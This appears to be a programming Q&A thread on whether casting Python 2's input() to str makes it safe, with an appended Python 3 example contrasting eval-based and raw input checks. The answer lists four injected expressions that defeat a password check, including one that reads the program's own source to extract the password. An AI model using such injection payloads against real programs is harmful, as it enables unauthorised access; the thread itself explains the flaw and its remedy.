Is input() safe to use if you cast it as a string?

I've been experimenting with python 2.7's input() function and trying to find ways to exploit it. I know that by itself it's vulnerable to exploitation because you can input python expressions, which will then be evaluated. My question is, if you cast it as a string, ie:

str(input())

is it still vulnerable to these exploits? Does this make it completely safe?

As an example, given the following program, is there any way to exploit input() and make it output "RIGHT password"?

import random
inp = str(input("Enter the password: "))
password = random.randint(0, 100)
if inp == password:
    print "RIGHT password" 
else:
    print "WRONG password"
T. Owens asked Dec 03 '22 22:12

1 Answer

is there any way to exploit input() and make it output "RIGHT password"?

Yep:

C:\Users\Kevin\Desktop>py -2 test.py
Enter the password: __import__('sys').stdout.write('RIGHT password') or exit(0)
RIGHT password
C:\Users\Kevin\Desktop>

"But that doesn't count because you're printing your own output and terminating early", you protest hypothetically. "Show me an example where the conditional actually executes".

C:\Users\Kevin\Desktop>py -2 test.py
Enter the password: (1, globals().update({"random": type("", (object,), {"__init__": lambda self: setattr(self, "randint", lambda x,y: "1")})()}))[0]
RIGHT password

C:\Users\Kevin\Desktop>

"Ok, well, in a real application I wouldn't be using random.randint to determine the password. Show me an example where the conditional inp == "hunter2": passes"

import random
inp = str(input("Enter the password: "))
if inp == "hunter2":
    print "RIGHT password" 
else:
    print "WRONG password"
C:\Users\Kevin\Desktop>py -2 test.py
Enter the password: __import__("re").search(r"if inp == \"(.*?)\"", open(__file__).read()).group(1)
RIGHT password

"That doesn't count because you read the file. Show me an example where you don't extract the password from the source code"

C:\Users\Kevin\Desktop>py -2 test.py
Enter the password: type("", (str,), {"__str__": lambda self: self, "__eq__": lambda self, other: True})()
RIGHT password

C:\Users\Kevin\Desktop>
Kevin answered Dec 11 '22 17:12
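Added example (not code from the question or from Kevin's answer): Python 3 code that models Python 2's input() as eval() over the typed line, so the str() cast from the question can be checked against the answer's last payload, next to the raw_input()-style check that never evaluates the line at all. PASSWORD, the function names and the use of hmac.compare_digest are my assumptions.

```python
import hmac

PASSWORD = "hunter2"  # constructed sample secret, same value as the answer's example

# The __eq__-override input from the answer above, reused here as the test input.
EQ_OVERRIDE_PAYLOAD = (
    'type("", (str,), {"__str__": lambda self: self, '
    '"__eq__": lambda self, other: True})()'
)


def python2_input(line):
    """Stand-in for Python 2's input(): the text is evaluated as an expression
    before the caller ever sees it, so any str() applied afterwards comes too late."""
    return eval(line)  # deliberately unsafe: this is the flaw under discussion


def check_with_cast(line):
    """The pattern from the question: str(input(...)) == password."""
    inp = str(python2_input(line))  # str() keeps a str subclass instance as-is
    return inp == PASSWORD          # so the object's own __eq__ decides the result


def check_raw(line):
    """Hardened: never evaluate the line. Python 2 raw_input() and Python 3
    input() already hand back the bare text; compare it in constant time."""
    return hmac.compare_digest(line.encode("utf-8"), PASSWORD.encode("utf-8"))


def plain_text_is_rejected(line):
    """True if typing the password without quotes makes input() fail with
    NameError: the evaluation step breaks legitimate users as well."""
    try:
        python2_input(line)
    except NameError:
        return True
    return False
```

With input(), even a cooperative user has to type the password in quotes for the cast version to succeed, while the raw check accepts the bare text and nothing else.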